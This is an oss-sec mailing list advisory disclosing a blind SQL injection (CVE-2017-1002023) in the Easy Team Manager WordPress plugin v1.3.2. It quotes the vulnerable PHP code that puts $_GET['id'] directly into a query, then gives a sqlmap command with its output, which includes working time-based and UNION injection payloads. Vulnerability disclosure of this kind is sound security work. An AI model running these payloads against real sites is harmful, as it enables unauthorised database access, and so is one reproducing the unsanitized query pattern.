oss-sec mailing list archives
Blind SQL Injection in Wordpress Plugin Easy Team Manager v1.3.2
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 30 May 2017 18:46:16 -0400
Title: Blind SQL Injection in Wordpress Plugin Easy Team Manager v1.3.2 Author: Larry W. Cashdollar, @_larry0 Date: 2017-05-24 CVE-ID:[CVE-2017-1002023] Download Site: https://wordpress.org/plugins/easy-team-manager/ Vendor: https://daisythemes.com/ Vendor Notified: 2017-05-24 Vendor Contact: web form contact Advisory: http://www.vapidlabs.com/advisory.php?v=194 Description: Easy Team Manager helps you to create team members with their short descriptions, social profiles link with smooth hover effects. Vulnerability: The following code does not sanitize $_GET['id'] before making it part of an SQL statement in file ./easy-team-manager/inc/easy_team_manager_desc_edit.php: 85- global $wpdb; 86- $easy_team_manager_desc = $wpdb->get_results("SELECT *from ".$wpdb->prefix."easy_team_manager_description where id=".$_GET['id']); 87- foreach ($easy_team_manager_desc as $s ){ 88- $ind_name_detail = unserialize($s->name); 89- $socia_media = unserialize($s->social_media); 90: $id=$_GET['id']; 91- $ind_position = esc_attr($s->position); 92- $ind_image=$s->image; 93- $ind_email_detail = unserialize($s->email); 94- $ind_phone_detail = unserialize($s->phone); 95- $ind_desc = esc_attr(stripcslashes($s->ind_description)); This allows blind SQL injection via the id parameter by an authenticated user with edit team priveledges. Exploit Code: • $ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=*' --load-cookies=./cookies.txt --level=4 --risk=3 --dbms=mysql • • [08:39:09] [INFO] URI parameter '#1*' is 'MySQL UNION query (84) - 1 to 20 columns' injectable • URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 3115 HTTP(s) requests: • --- • Parameter: #1* (URI) • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=(CASE WHEN (3623=3623) THEN SLEEP(5) ELSE 3623 END) • Type: UNION query • Title: MySQL UNION query (84) - 5 columns • Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=-5307 UNION ALL SELECT 84,CONCAT(0x7170787a71,0x58795a426e467457726744686879446f4e4d7a576a464758516e6765526549536279426759527443,0x7178787171),84,84,84# • --- • [08:39:15] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Ubuntu 16.04 (xenial) • web application technology • : Apache 2.4.18 • back-end DBMS: MySQL >= 5.0.12 • [08:39:15] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • • [*] shutting down at 08:39:15
Current thread:
- Blind SQL Injection in Wordpress Plugin Easy Team Manager v1.3.2 Larry W. Cashdollar (May 30)